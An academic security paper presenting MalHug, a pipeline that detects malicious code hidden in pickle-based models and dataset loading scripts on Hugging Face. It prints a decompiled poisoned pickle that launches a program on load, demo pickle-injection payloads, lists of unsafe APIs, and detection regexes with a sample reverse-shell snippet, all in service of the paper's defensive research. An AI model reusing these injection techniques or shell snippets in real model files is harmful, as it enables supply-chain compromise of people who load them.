
Zhao et al. - 2017 - Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs

This document presents a systematic study of malicious code poisoning attacks on pre-trained model hubs, particularly focusing on the Hugging Face platform. It introduces MalHug, an end-to-end pipeline designed to detect and classify malicious models and datasets, which has been successfully deployed in a real-world industrial setting. The findings reveal significant security threats and emphasize the need for robust security measures in managing and deploying pre-trained models.


Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs

Jian Zhao1*, Shenao Wang1*, Yanjie Zhao1†, Xinyi Hou1, Kailong Wang1, Peiming Gao2, Yuanchao Zhang2, Chen Wei2†, Haoyu Wang1
1 Huazhong University of Science and Technology
{jian_zhao_,shenaowang,yanjie_zhao,xinyihou,wangkl,haoyuwang}@hust.edu.cn
2 Mybank, Ant Group
{peiming.gpm,yuanchao.zhang,juyi.wc}@mybank.cn
ABSTRACT
The proliferation of pre-trained models (PTMs) and datasets has led to the emergence of centralized model hubs like Hugging Face, which facilitate collaborative development and reuse. However, recent security reports have uncovered vulnerabilities and instances of malicious attacks within these platforms, highlighting growing security concerns. This paper presents the first systematic study of malicious code poisoning attacks on pre-trained model hubs, focusing on the Hugging Face platform. We conduct a comprehensive threat analysis, develop a taxonomy of model formats, and perform root cause analysis of vulnerable formats. While existing tools like Fickling and ModelScan offer some protection, they face limitations in semantic-level analysis and comprehensive threat detection. To address these challenges, we propose MalHug, an end-to-end pipeline tailored for Hugging Face that combines dataset loading script extraction, model deserialization, in-depth taint analysis, and heuristic pattern matching to detect and classify malicious code poisoning attacks in datasets and models. In partnership with Ant Group, a leading financial technology company, we have implemented and deployed MalHug in a real-world industrial environment. It has been operational for over three months on a mirrored Hugging Face instance within Ant Group's infrastructure, demonstrating its effectiveness and scalability in a large-scale industrial setting. During this period, MalHug has monitored more than 705K models and 176K datasets, uncovering 264 malicious models and 9 malicious dataset loading scripts. These findings reveal a range of security threats, including reverse shell, browser credential theft, and system reconnaissance. This work not only bridges a critical gap in understanding the security of the PTM supply chain but also provides a practical, industry-tested solution for enhancing the security of pre-trained model hubs.

1 INTRODUCTION
In recent years, Large Language Models (LLMs) such as ChatGPT [57] have made significant progress, largely due to advancements in pre-training techniques. These pre-training methods have enabled the development of models with massive scale, often reaching billions or even trillions of parameters [2, 18, 40]. The reuse of these Pre-trained Models (PTMs) has become increasingly important in advancing various AI applications. In this context, model hubs (also known as model registries) like Hugging Face [27] play a significant role in facilitating the reuse of pre-trained models [30]. Serving as a centralized repository, Hugging Face currently hosts an impressive collection of over 761K models and 176K datasets as of July 12, 2024 [27, 32], which provides a collaborative environment for storing and sharing a wide variety of PTMs and datasets.

With the emerging popularity and influence of model hubs, their centralized nature and widespread use also make them high-value targets for malicious actors [31, 60, 82]. Recent security reports have uncovered vulnerabilities [1, 3, 12, 48] and instances of malicious attacks [4, 9, 13, 14, 79, 85] within the Hugging Face platform, highlighting the growing security concerns in model hubs. One primary attack vector involves injecting malicious code into models [9, 79] or datasets [1]. This can be achieved through various means, such as compromising developer accounts [3], exploiting vulnerabilities in the platform's upload or verification processes [48], or disguising malicious code as legitimate model components [5, 9]. Of particular concern is the exploitation of certain serialization methods, such as Python's pickle module [66], which have inherent security implications. These methods enable malicious actors to inject harmful code during the serialization process, which can then be executed when the compromised models are loaded for training or inference [70]. Malicious code poisoning can be used to achieve a range of nefarious goals, including but not limited to backdoor installation [9, 11, 38], sensitive information theft [5, 20], and ransomware deployment [14].

Security researchers are aware of these attacks and have proposed several defensive solutions. Trail of Bits has developed Fickling [52], a practical decompiler, static analyzer, and bytecode rewriter for pickle files. ProtectAI has introduced ModelScan [63], a versatile tool designed to detect security issues across various model formats. Hugging Face has implemented PickleScanning [16], which incorporates an anti-virus scan utilizing ClamAV [7] and a targeted analysis that extracts and examines the list of imports referenced within pickle files. While these solutions represent significant progress, they face notable limitations. These tools primarily rely on detecting specific libraries and function calls rather than analyzing the actual executed code, which makes it challenging to conduct semantic-level analysis of malicious behaviors, potentially leading to both false positives and false negatives, especially when faced with sophisticated or obfuscated attacks. Moreover, there is a lack of comprehensive understanding of the abuse and attack techniques targeting the PTM supply chain. This gap in knowledge limits our ability to develop advanced defense strategies against the full spectrum of threats in PTM ecosystems.

* Both authors contributed equally to this research.
† Yanjie Zhao ([email protected]) and Chen Wei ([email protected]) are the corresponding authors.

Motivated by the above security concerns, we conduct the first systematic study of malicious code poisoning attacks on pre-trained
Conference’17, July 2017, Washington, DC, USA Zhao et al.

model hubs, bridging the critical gap in understanding the vulnerabilities and attack vectors within the PTM supply chain. In our study, we first undertake a comprehensive pilot study, encompassing threat modeling, systematic model format taxonomy, and root cause analysis of vulnerable model formats. Building on these insights, we propose MalHug, an end-to-end pipeline tailored for Hugging Face that combines dataset loading scripts extraction, model deserialization, in-depth taint analysis, and heuristic pattern matching, enabling nuanced detection and classification of malicious datasets and models.

We have implemented and deployed MalHug in collaboration with Ant Group, a leading financial technology company, demonstrating its scalability and effectiveness in a real-world industrial setting. MalHug has been operational for over three months on a mirrored Hugging Face instance within Ant Group's infrastructure, continuously monitoring more than 705K models and 176K datasets. Through this comprehensive industrial-grade analysis, MalHug has successfully identified 264 malicious models and 9 malicious dataset loading scripts, uncovering a range of security threats, including sophisticated remote control, browser credential theft, and system reconnaissance. These findings underscore the urgent need for robust security measures in industrial AI pipelines and provide valuable insights into the specific security challenges faced by large-scale financial technology companies in managing and deploying pre-trained models.

To summarize, we make the following contributions:
• Systematic Study. We conduct the first systematic study of malicious code poisoning attacks on PTM hubs, including comprehensive threat modeling, a systematic taxonomy of model formats, and root cause analysis of vulnerable model formats, which bridges a critical gap in understanding the vulnerabilities and attack vectors within the PTM supply chain.
• Practical Pipeline. We design and implement MalHug, an end-to-end pipeline tailored for Hugging Face. By integrating dataset loading script extraction, model deserialization, in-depth taint analysis, and heuristic pattern matching, MalHug offers a more nuanced and effective approach to detecting and classifying malicious PTMs and dataset loading scripts.
• Industrial Deployment. We demonstrate the industrial applicability of MalHug through a real-world deployment in collaboration with Ant Group. Our system has been operational for over three months on a mirrored Hugging Face instance within Ant Group's infrastructure, monitoring more than 705K models and 176K datasets. This analysis uncovered 264 malicious models and 9 malicious dataset loading scripts, revealing various security threats and providing valuable insights into securing the pipeline for managing and deploying PTMs in financial technology companies.

2 BACKGROUND
In this section, we introduce the background about model hubs and artifact (datasets and models) reuse, present the threat model and attack surface analysis, and provide a taxonomy of model formats along with the root cause analysis of their vulnerabilities.

2.1 Model Hubs and Artifact Reuse
Model hubs, also known as model registries, have become integral to the AI ecosystem, serving as centralized repositories for pre-trained models, datasets, and associated resources. These platforms facilitate the distribution, discovery, and deployment of pre-trained models across various domains and applications. Table 1 presents an overview of the top 15 popular model hubs, showcasing the scale and diversity of available resources.

Table 1: Top 15 popular model hubs: number of models and datasets, and distribution mechanisms (as of July 6, 2024). Note that "-" indicates no public statistics available or no dataset hosting service provided.

Model Hub             #Models   #Datasets   Distribution
Hugging Face [26]     752,269   174,226     Hub APIs, Git
Spark NLP [34]        41,346    -           Hub APIs, Download
OpenCSG [58]          26,187    327         Git
Kaggle [35]           5,932     355,251     Hub APIs, Download
ModelScope [44]       5,749     2,302       Hub APIs, Git
ModelZoo [47]         3,245     -           Git
OpenMMLab [59]        2,404     -           Git
ONNX Model Zoo [55]   1,720     -           Git
NVIDIA NGC [51]       759       -           CLI, Download
MindSpore [45]        706       390         Git, Download
WiseModel [83]        624       524         Git
PaddlePaddle [61]     272       10,000      Git
SwanHub [71]          269       -           Git
Liandanxia [41]       264       381         Git
PyTorch Hub [68]      52        -           Hub APIs, Git

Among these registries, Hugging Face [27] stands out as the largest and most comprehensive platform, hosting an impressive 752,269 models and 174,226 datasets as of July 6, 2024. Its extensive collection spans a wide range of AI tasks and domains, making it a go-to resource for researchers, developers, and practitioners alike. Given its dominant position in the field and its significant impact on the AI community, we have chosen to focus primarily on Hugging Face as the main subject of our study in this paper.

The proliferation of artifacts (datasets and models) on Hugging Face has significantly impacted the landscape of AI research and development, fostering a culture of reuse and collaboration. Researchers and developers can leverage existing artifacts to train new models or fine-tune pre-trained ones for specific tasks, reducing the time and resources required for data collection, annotation, and model development. Hugging Face provides convenient tools for artifact reuse, such as the datasets library for loading and processing datasets, and the transformers library for accessing pre-trained models. For instance, users can easily load datasets using the datasets.load_dataset() function, and access pre-trained models via the AutoModel.from_pretrained() method. This ecosystem of shared resources has led to the emergence of transfer learning as a dominant paradigm, where models pre-trained on large datasets are adapted for various downstream tasks using techniques like fine-tuning or prompt engineering.
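This reuse convenience is exactly what makes the attacks studied in this paper possible: loading a shared artifact often means deserializing it with pickle. As a minimal, deliberately harmless sketch (our illustration, not code from the paper), a pickled object can carry a callable that the unpickler executes at load time:

```python
import pickle

class Payload:
    """Illustrative poisoned object: __reduce__ tells the unpickler to
    call an arbitrary callable (here a harmless eval of "6 * 7") instead
    of rebuilding plain data."""
    def __reduce__(self):
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())
# Anyone who "just loads the model" executes the embedded call:
result = pickle.loads(blob)
print(result)  # 42
```

A real attacker would return `os.system` with a shell command instead of `eval`; the mechanism is identical, which is the root cause analyzed in Section 3.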

2.2 Code Poisoning Attacks on Model Hubs
Attack Vectors. While model hubs like Hugging Face have greatly benefited the AI community, their centralized nature and widespread use also make them attractive targets for malicious actors [31, 60, 82]. To understand the security implications, we conduct a threat modeling and attack surface analysis of Hugging Face, focusing primarily on code poisoning attacks, which share similarities with supply chain attacks in open-source software ecosystems [11, 54]. Recently, security researchers [1, 9, 13] have reported two main attack vectors for code poisoning in model hubs:
• Dataset Loading Scripts Exploitation. The dataset loading script is a default feature provided by Hugging Face, typically employed to load and share datasets composed of data files in unsupported formats or requiring more complex data preparation. When users invoke the load_dataset function, the corresponding loading script with the same name will be executed by default [15, 24]. While enhancing flexibility, this feature creates a significant attack surface, where malicious actors could embed harmful scripts within these datasets [1]. When loaded, these scripts execute automatically, potentially causing severe security breaches. This vulnerability exploits users' trust in reputable data sources and creates a substantial attack surface through automated script execution.
• Insecure Model Serialization. Many PTMs use insecure serialization formats like pickle [66], which allow arbitrary code execution during deserialization. This creates a significant risk of injecting malicious code into model files. When users load compromised models, the embedded malicious code executes, potentially leading to severe security breaches [9, 13]. This vulnerability is exacerbated by the widespread sharing of PTMs and users' implicit trust in models from popular repositories. The complexity and opaqueness of PTMs make detecting such embedded malicious code particularly challenging, rendering this attack vector difficult to defend against.

Threat Model. The attack vectors we have identified exploit the complex trust relationships within model hubs like Hugging Face. Our threat model is based on several key assumptions about the AI ecosystem. Firstly, users generally trust content from well-known model hubs and popular contributors, often prioritizing convenience and efficiency over rigorous security checks when using shared resources. Additionally, security measures on model hubs may not always keep pace with rapidly evolving threats. In this environment, potential attackers possess a range of capabilities that make them formidable adversaries. They have access to the public-facing interfaces of model hubs and can create and upload datasets and models to these platforms. More concerning is their array of methods to gain or reinforce trust within the community. For instance, attackers might exploit leaked authentication tokens [3] to gain unauthorized access to reputable accounts, allowing them to operate under the guise of trusted entities. They could also employ AI Jacking [48] techniques, registering abandoned model or dataset names previously associated with respected organizations, thereby exploiting residual trust. These sophisticated approaches enable attackers to establish or hijack trusted identities within the model hubs, significantly increasing the potential impact of their malicious activities.

3 TAXONOMY AND ROOT CAUSE ANALYSIS
Pre-trained models employ a diverse range of serialization formats for persistent storage and loading [53, 62]. These formats can be categorized based on their serialization mechanisms, security implications, and prevalence in the PTM ecosystem. Table 2 presents a comprehensive overview of 15 popular model formats, categorizing them based on their storage capabilities and vulnerability to code injection attacks. The formats are broadly divided into two categories: those that store both architecture and weights, and those that store weights only.

Table 2: Taxonomy of 15 popular model formats and their vulnerability to code injection. Note that ● indicates that this model format is vulnerable to code injection, ◐ represents partially vulnerable, and ○ indicates that this model format is not vulnerable (as of current knowledge).

Stored          Model Format         Framework               Injection?
Architecture    pickle [66]          PyTorch, Scikit-learn   ●
& Weights       marshal [65]         /                       ●
                joblib [33]          PyTorch, Scikit-learn   ●
                dill [42]            PyTorch, Scikit-learn   ●
                cloudpickle [8]      Scikit-learn, MLFlow    ●
                SavedModel [74]      TensorFlow              ◐
                Checkpoint [72]      TensorFlow              ◐
                TFLite [75]          TFLite                  ◐
                HDF5 [73]            Keras                   ◐
                GGUF [19]            llama.cpp               ○
                ONNX [56]            ONNX                    ○
Weights         JSON [64]            /                       ○
Only            MsgPack [43]         Flax                    ○
                Safetensors [28]     Hugging Face            ○
                NPY [49] / NPZ [50]  NumPy                   ○

Formats Storing Both Architecture & Weights. Formats that store both architecture and weights provide a complete representation of the model, including its structure and learned parameters. However, this completeness often comes at the cost of increased security risks. As shown in Table 2, several widely used formats in this category have varying levels of vulnerability to code injection attacks.
• Pickle Variants (Insecure). These Python-specific serialization formats, including pickle [66], marshal [65], joblib [33], dill [42], and cloudpickle [8], are notorious for their susceptibility to code injection. They can execute arbitrary Python code during deserialization, making them highly vulnerable when handling untrusted data.
• TensorFlow and Keras Models (Potential). These formats, primarily associated with TensorFlow [72, 74, 75] and Keras [73], have a reduced but still present attack surface. They support custom operators (SavedModel, Checkpoint, TFLite) [78] or lambda layers (HDF5) [79] that can potentially execute arbitrary code, though with some additional barriers compared to pickle-like formats.
• GGUF and ONNX (Secure). These more recent formats show promise in terms of security, with no known vulnerabilities to code injection as of current knowledge. They strictly limit their scope to predefined model computation and transformation
Conference’17, July 2017, Washington, DC, USA Zhao et al.

operations, avoiding support for arbitrary code execution or object instantiation [62].

Root Cause ▶ The vulnerabilities in these formats stem from a fundamental tension between flexibility and security in serialization design. Arbitrary object instantiation in pickle variants creates the most severe security risk, effectively blurring the line between data and code. Lambda layers, particularly in HDF5 (Keras), introduce an indirect but significant risk through their dependency on the marshal module for code serialization. Custom operators in formats like SavedModel and TFLite present a smaller attack surface, as they require explicit loading during inference, but still pose potential risks. ◀

Formats Storing Weights Only. Formats that store only weights provide a more focused representation of the model, containing just the learned parameters without the architectural details. This approach can offer improved security against code injection attacks, as the architecture is typically defined separately in code. As shown in Table 2, these formats generally have a lower risk of code injection vulnerabilities.
• JSON (Secure). JavaScript Object Notation (JSON) [64] is a lightweight, text-based data interchange format. While not specifically designed for ML model storage, it can be used to store model weights. JSON is generally safe from code injection as it only supports basic data types and structures, without the ability to represent code or complex objects.
• MsgPack (Secure). Used by Flax, MessagePack (MsgPack) [43] is a binary serialization format. It is similar to JSON in terms of the data it can represent but more compact. MsgPack does not support code serialization, making it resilient against direct code injection attacks.
• Safetensors (Secure). Developed by Hugging Face [28], Safetensors is designed to prevent code injection attacks. It uses a simple, language-agnostic format that strictly limits deserialization to numerical data, effectively eliminating the risk of arbitrary code execution during the loading process.
• NPY / NPZ (Secure). These NumPy-specific formats [49, 50] are primarily designed for storing numerical arrays. While they do not directly support code execution during deserialization, care must be taken to properly handle the data to avoid potential buffer overflow vulnerabilities.

Security Features ▶ The security advantages of these formats highlight the importance of separating model architecture (which may require more complex serialization) from weight storage in machine learning workflows, especially when dealing with potentially untrusted data sources. ◀

4 MALHUG WORKFLOW
In this section, we introduce MalHug, a comprehensive end-to-end pipeline specifically designed for Hugging Face, focusing on detecting code poisoning attacks on dataset loading scripts and vulnerable model files (pickle variants and lambda layers in HDF5). Figure 1 illustrates the workflow of MalHug, which comprises four key components: dataset loading scripts extraction, model deserialization, in-depth taint analysis, and heuristic pattern matching. Notably, MalHug does not aim to invent new program analysis techniques. Instead, it leverages insights from existing attacks to construct an efficient and practical review pipeline for identifying and analyzing potential security threats within Hugging Face.

Figure 1: The workflow of MalHug: extracting suspicious codes from dataset loading scripts (§4.1) and deserialized models (§4.2), then applying taint analysis (§4.3) and heuristic pattern matching (§4.4) to detect malicious behavior.

4.1 Dataset Loading Scripts Extraction
The dataset pre-processing stage forms the initial step of our analysis pipeline, focusing on the extraction and examination of loading scripts associated with datasets from Hugging Face.
Loading Script Identification. When users employ load_dataset from Hugging Face's API, the system executes the namesake loading script by default [24]. So, we begin by analyzing the file list associated with each dataset obtained from Hugging Face. MalHug searches for Python scripts (.py files) that share the same base name as the dataset or its components. For instance, if a dataset is named "text_classification_data", we would extract scripts such as "text_classification_data.py". This method allows us to focus on code that is most likely to be executed in conjunction with the dataset.
406 4 464
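Stepping back to the Root Cause note in Section 3: the marshal dependency behind Keras Lambda layers means a serialized layer is, in effect, shippable code. A small sketch of why (our illustration, with a harmless payload): marshal round-trips raw code objects, and whoever deserializes them can be made to execute them:

```python
import marshal

# Serialize a code object, analogous to how Lambda layers are stored.
payload = compile("result = 6 * 7", "<lambda-layer>", "exec")
blob = marshal.dumps(payload)

# Deserialization yields executable code, not inert data.
code = marshal.loads(blob)
ns = {}
exec(code, ns)          # running the layer runs the embedded logic
print(ns["result"])     # 42
```

Note that marshal round-trips are only guaranteed within the same Python version, which is exactly the constraint that complicates static analysis of these layers (see §4.2).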

Table 3: Unsafe Libraries and APIs.

Category              Unsafe Libs/APIs
Builtin Functions     eval, exec, execfile; __import__, getattr; compile, open
Command Execution     os.system/popen/spawn*; subprocess.run/call/Popen
Network               requests.get/post; urllib.request.urlopen/Request; socket.socket/connect; ftplib.FTP, smtplib.SMTP
File System           shutil.rmtree/move; pathlib.Path, os.path.join; zipfile.ZipFile, tarfile.open; glob.glob, fnmatch.filter
System Information    os.environ/getcwd; platform.system/release
Cryptography          Crypto.Cipher.AES/DES; cryptography.fernet.Fernet; rsa.encrypt/decrypt; base64.b64encode/b64decode

Table 4: Unsafe Pickle opcodes.

Opcode                Description
REDUCE (b'R')         Applies callable object to argument tuple; pops function and args, pushes return value
GLOBAL (b'c')         Imports modules or gets global objects; pushes retrieved object onto stack
OBJ (b'o')            Builds class instance (Protocol 1); uses class object from stack
INST (b'i')           Builds class instance (Protocol 0); uses module and class names
NEWOBJ (b'\x81')      Builds object instance using __new__; calls cls.__new__(cls, *args)
NEWOBJ_EX (b'\x92')   Extended version of NEWOBJ; calls cls.__new__(cls, *args, **kwargs)

Unsafe Library and API Filtering. Once the relevant scripts are extracted, we perform an initial analysis to identify unsafe libraries and APIs. This process involves scanning the script contents for import statements and function calls and cross-referencing them against a curated list of potentially unsafe libraries and APIs. The risky APIs and libraries are listed in Table 3, including known dangerous functions (e.g., eval, exec), libraries associated with command execution (e.g., os, subprocess), and networking modules that could indicate unauthorized data transmission (e.g., requests, urllib). We employ regular expressions and AST (Abstract Syntax Tree) parsing to efficiently identify these elements within the code.

4.2 Model Deserialization
Model deserialization is a crucial step in our security analysis pipeline, designed to uncover potentially malicious code or suspicious operations within machine learning model files. Our approach is tailored to handle various vulnerable model formats used by popular frameworks such as PyTorch, Keras, and TensorFlow.
PyTorch/Pickle Variants Decompilation. For PyTorch models saved in .pth, .pt, or .bin formats, which are essentially ZIP archives typically containing a data.pkl weights file, we employ a multi-stage decompilation process to analyze potentially malicious code without execution risk. As illustrated in Figure 2, our process begins with extracting the data.pkl file from the model archive (Step#1). We then use pickletools [67] to disassemble the pickle bytecode into human-readable opcodes (Step#2). This disassembly reveals the underlying structure of the serialized data, such as the GLOBAL opcode (Step#2, line 2), which imports the runpy._run_code function, a potential vector for code execution. We scan these opcodes for unsafe operations that could lead to code injection (see Table 4 for a list of potentially unsafe Pickle opcodes). Upon detecting such unsafe opcodes, we employ Fickling [52] to further decompile the pickle file into an AST, as depicted in Step#3. This higher-level representation exposes the structure of the potentially malicious code. From the AST, we extract suspicious code snippets by analyzing function call arguments. In Figure 2, we identify a function call to runpy._run_code with a constant argument that appears to be a Python script (Step#3, lines 10-12), which is extracted as potentially malicious code.
TensorFlow/Keras Model Deserialization. The process of deserializing and analyzing TensorFlow and Keras models, as outlined in Algorithm 1, focuses on detecting Lambda layers and unsafe operators within these models. The deserialization process begins with ParseModelStructure (line 1), which handles two primary formats: SavedModel and HDF5. For SavedModel, we utilize the TensorFlow SavedMetadata.ParseFromString [81] to load the model metadata and SavedModel.ParseFromString [69] to load the model itself. For the HDF5 format, we employ h5py.File [21, 81] to read the model file, extracting the model_config attribute containing a JSON string of the model architecture, and parsing this JSON string to obtain layer configurations. Once the model structure is parsed, our algorithm iterates through each layer using IterateLayers (lines 7-16). This function abstracts the differences between the SavedModel and HDF5 formats, providing a unified interface for layer iteration. During iteration, we check for Lambda layers using IsLambdaLayer. Simultaneously, we employ CheckForUnsafeOperators (lines 17-23) to identify any usage of potentially risky operations. This function searches for specific TensorFlow operations that could pose security risks, such as file I/O operations (tf.io.read_file [76], tf.io.write_file [77]). Note that we do not conduct in-depth taint analysis on Lambda layers or unsafe operators. This decision is based on several technical constraints and considerations. Primarily, the deserialization of marshal-encoded Lambda layers depends on marshal.load [65] of specific Python versions. Moreover, these layers would require dynamic loading in a sandboxed environment. Given these limitations, we have opted to simply flag these instances as potentially unsafe and manually check these models.

4.3 In-depth Taint Analysis
After extracting suspicious code snippets from dataset loading scripts and PyTorch/Pickle Variants models, MalHug implements a focused taint analysis, which has proven effective at detecting a wide range of malicious code poisoning attack patterns in
522 5 580
Conference’17, July 2017, Washington, DC, USA Zhao et al.

Step#1 Original Binary:

    80 02 63 72 75 6E 70 79 0A 5F 72 75 6E 5F 63 6F 64 65 0A 71 00 58 30 00 00 00 69 6D 70 6F 72 74 20 73 75 62 70 72 6F 63 65 73 73 0A 0A 73 75 62 70 72 6F 63 65 73 73 2E 72 75 6E 28 5B 27 43 61 6C 63 2E 65 78 65 27 5D 29 0A 71 01 7D 71 02 86 71 03 52 71

    b'\x80\x02crunpy\n_run_code\nq\x00X0\x00\x00\x00import subprocess\n\nsubprocess.run([\'Calc.exe\'])\nq\x01}q\x02\x86q\x03Rq...

Step#2 Disassembled Code:

    1    0: \x80 PROTO      2
    2    2: c    GLOBAL     'runpy _run_code'
    3   19: q    BINPUT     0
    4   21: X    BINUNICODE "import subprocess\n\nsubprocess.run(['Calc.exe'])\n"
    5   74: q    BINPUT     1
    6   76: }    EMPTY_DICT
    7   77: q    BINPUT     2
    8   79: \x86 TUPLE2
    9   80: q    BINPUT     3
    10  82: R    REDUCE
    11  83: q    BINPUT     4
    ...

Step#3 Decompiled AST:

    Module(
      body=[
        ImportFrom(
          module='runpy',
          names=[alias(name='_run_code')],
          level=0),
        Assign(
          targets=[Name(id='_var0', ctx=Store())],
          value=Call(
            func=Name(id='_run_code', ctx=Load()),
            args=[
              Constant(value="import subprocess\n\nsubprocess.run(['Calc.exe'])\n"),
              Dict(keys=[], values=[])],
            keywords=[])),
    ...

Figure 2: The Pickle model decompilation process of MustEr/gpt2-elite. Snippet #1 is the original binary code, snippet #2 is the disassembled code, and snippet #3 is the decompiled AST. Green highlights suspicious opcodes, while Red indicates potentially malicious code.
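The Step#2 disassembly can be reproduced with Python's standard library alone. The sketch below runs pickletools over a small hand-crafted pickle (a benign stand-in for a poisoned data.pkl, not the payload shown above) and flags the opcode families that can trigger code execution on load:

```python
import io
import pickletools

# Hand-crafted pickle equivalent to serializing an os.system("whoami")
# call; a benign stand-in for a poisoned data.pkl, never actually loaded.
payload = (b"\x80\x02cos\nsystem\nq\x00"
           b"X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.")

buf = io.StringIO()
pickletools.dis(payload, out=buf)  # disassembles WITHOUT executing anything
listing = buf.getvalue()

# Opcode families that can lead to code execution when the pickle is loaded
risky = ("GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "BUILD")
hits = [op for op in risky if op in listing]
print(hits)  # ['GLOBAL', 'REDUCE']
```

In MalHug's pipeline, any such hit escalates the file to the Fickling-based AST decompilation shown in Step#3.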
To perform this analysis, we build MalHug on Scalpel [37], an open-source static analysis framework. We use Scalpel to construct control flow and data flow graphs, which serve as the foundation for our taint analysis. On top of this foundation, we define a comprehensive taint configuration based on a categorized set of source and sink APIs. These APIs are typically drawn from the unsafe APIs listed in Table 3, but we assign them to specific source-sink combinations based on different malicious behavior patterns. Our configuration encompasses a wide range of potential security threats, including hidden authentication, backdoors, cryptojacking, embedded shells, remote control, sensitive information leakage, and suspicious execution patterns.

For each category of threat, we identify specific classes of source and sink APIs that could indicate malicious behavior. For example, in the case of sensitive information leakage, we might consider os.environ or os.getlogin as sources, and requests.get or socket.connect as sinks; this combination could reveal attempts to collect sensitive system information and transmit it to an unauthorized external server. For remote control detection, we might consider reverse shell commands as sources, and command execution APIs such as os.system, os.spawn*, and subprocess.run as sinks, possibly indicating the injection of unauthorized shell commands. These source-sink pairings allow us to track the flow of potentially malicious operations through the code, providing a nuanced understanding of various attack vectors.

Algorithm 1: Unsafe Keras/TensorFlow Models Detection

    Input: Model file M, a set of unsafe_opt
    Output: Usage of Lambda layers and unsafe operators

     1  model ← ParseModelStructure(M);
     2  foreach layer ∈ IterateLayers(model) do
     3      if IsLambdaLayer(layer) then
     4          has_lambda_layer ← True;
     5          break;
     6      unsafe_opt.update(CheckForUnsafeOpt(layer));
     7  Function IterateLayers(model):
     8      if model is SavedMetadata then
     9          foreach node ∈ model.nodes do
    10              if node.identifier = "_tf_keras_layer" then
    11                  layer ← JSON.parse(node.metadata);
    12                  yield layer;
    13      else
    14          config ← parse(model.attrs["model_config"]);
    15          foreach layer ∈ config["config"]["layers"] do
    16              yield layer;
    17  Function CheckForUnsafeOpt(layer):
    18      unsafe_ops ← Set();
    19      risky_ops ← ["tf.io.read_file", "tf.io.write_file"];
    20      foreach op ∈ risky_ops do
    21          if contains(layer.to_string(), op) then
    22              unsafe_ops.add(op);
    23      return unsafe_ops;
    24  return has_lambda_layer, unsafe_opt;

4.4 Heuristic Pattern Matching

While our taint analysis provides a robust framework for detecting malicious behaviors based on API and library usage, we recognize that not all sources of potential threats can be defined solely through Python APIs or libraries. Certain taint sources, such as malicious shell commands or obfuscated malicious code patterns, cannot be effectively marked through API-based methods alone. To address this limitation and enhance our detection capabilities, we incorporate heuristic pattern matching as a complementary technique to our taint analysis, leveraging YARA [80] rules for efficient and flexible matching. By applying these YARA-based heuristics, we can detect various sophisticated attack patterns that do not rely solely on API calls, including reverse shell commands potentially obfuscated within strings or comments, suspicious network connection attempts defined by string patterns rather than API usage, unusual combinations of system calls or command structures indicative of malicious intent, code injection techniques that may bypass API-level detection, and indicators of fileless malware or in-memory execution.
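As a rough illustration of what such string-level rules match, the sketch below emulates one reverse-shell heuristic with Python's re module; the patterns are simplified stand-ins for the actual YARA rules, which are not reproduced here:

```python
import re

# Simplified stand-ins for YARA string rules targeting reverse shells;
# the real rules are more elaborate and compiled by the YARA engine.
REVERSE_SHELL_PATTERNS = [
    re.compile(rb"socket\.socket\(\).{0,120}connect\(", re.DOTALL),
    re.compile(rb"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]"),
    re.compile(rb"os\.dup2\(\s*\w+\.fileno\(\)"),
]

def matches(blob: bytes) -> list:
    """Return indices of patterns that fire on a raw artifact."""
    return [i for i, pat in enumerate(REVERSE_SHELL_PATTERNS) if pat.search(blob)]

# A snippet in the style of the payloads discussed later in Section 5.4
sample = (b"s=socket.socket();s.connect((RHOST,RPORT));"
          b"[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')")
print(matches(sample))  # [0, 1, 2]
```

A hit on any of these patterns marks the artifact as a heuristic taint source, which the subsequent taint analysis then tracks toward its sinks.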
The flexibility of YARA rules allows us to define complex pattern-matching logic that can adapt to evolving threat landscapes and capture taint sources that are not explicitly tied to API calls. The integration of YARA-based heuristic pattern matching with our taint analysis enables MalHug to achieve a more comprehensive and nuanced approach to malicious code detection in pre-trained models. This dual-pronged strategy significantly enhances our ability to identify both API-based and pattern-based threats, providing a robust defense against a wide array of potential security risks in AI systems.

5 EVALUATION

5.1 Experimental Setup

Implementation. We have implemented a prototype of MalHug and deployed it on the mirrored Hugging Face instance within Ant Group for over three months. The model decompilation module of MalHug is built upon the open-source Fickling [52] and ModelScan [63], enabling preliminary filtering of suspicious models. Furthermore, MalHug implements in-depth taint analysis based on Scalpel [37], complemented by custom YARA [80] rules to detect malicious taint flow patterns.

Environment. The prototype of MalHug runs on a server with Ubuntu Linux 22.04, equipped with two AMD EPYC Milan 7713 CPUs (2.0 GHz, 64 cores, 128 threads each), 512 GB RAM (8 x 64 GB modules), two NVIDIA A100 GPUs with 80 GB memory each, and four 7.68 TB NVMe SSDs (Western Digital SN640), providing a total storage capacity of 30.72 TB. The Hugging Face mirror synchronization service runs on an Alibaba Cloud ECS instance (ecs.c6a.16xlarge), optimized for data-intensive storage operations. The server operates on Alibaba Cloud Linux 3 and is equipped with 64 vCPUs, 128 GB of RAM, and 8 data disks, each with 32 TB capacity, providing a total storage of 256 TB.

Dataset. Due to the current lack of high-quality ground-truth datasets of malicious artifact samples, we evaluate the performance of MalHug in the wild and conduct a comprehensive investigation and measurement of real-world code poisoning attacks. We download and analyze accessible artifacts (models and datasets) on the largest model hosting platform, Hugging Face. Specifically, we use Hugging Face's official Python library, huggingface-hub [25], to automatically collect metadata of 760,999 models and 176,849 datasets as of July 12. After excluding models with restricted access permissions, we conduct a comprehensive analysis of 705,991 models and 176,386 datasets, collectively amounting to 179.4 TB of data.

5.2 Industrial Deployment & Measurement

Dataset Loading Script Statistics. Among the 176,386 mirrored datasets, 6,578 (3.73%) contain loading scripts. These scripts play a crucial role in data preprocessing pipelines, potentially introducing security vulnerabilities and compromising the integrity of AI workflows if not properly scrutinized. Subsequently, MalHug focuses its main analysis on the code within these 6,578 dataset loading scripts to identify and assess potential security risks.

Figure 3: File extension usage in Hugging Face. (Log-scale bar chart of model counts per file extension, grouped into Pickle variants (4.1%), PyTorch (51.0%), Keras (2.7%), TensorFlow (2.5%), NumPy (0.6%), and others (39.1%).)

